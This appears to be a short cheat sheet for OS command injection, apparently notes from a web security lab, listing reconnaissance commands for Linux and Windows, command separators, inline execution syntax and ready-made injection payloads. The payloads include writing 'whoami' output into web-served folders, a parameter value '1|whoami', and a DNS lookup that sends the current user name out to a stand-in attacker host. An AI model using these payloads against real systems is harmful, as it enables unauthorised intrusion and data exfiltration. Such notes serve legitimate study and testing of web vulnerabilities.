Useful commands
| Purpose of command | Linux | Windows |
|---|---|---|
| Name of current user | whoami |
whoami |
| Operating system | uname -a |
ver |
| Network configuration | ifconfig |
ipconfig /all |
| Network connections | netstat -an |
netstat -an |
| Running processes | ps -ef |
tasklist |
payloads
& echo tagazou &
& ping -c 10 127.0.0.1 &
& whoami > /var/www/static/whoami.txt &
& whoami > /var/www/images/whoami.txt &
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
command separator:
&
&&
|
||
;
Newline (0x0a or \\n)
inline execution of an injected command within the original command:
`
$(
OS command injection, simple case
Modify the storeID parameter, giving it the value 1|whoami.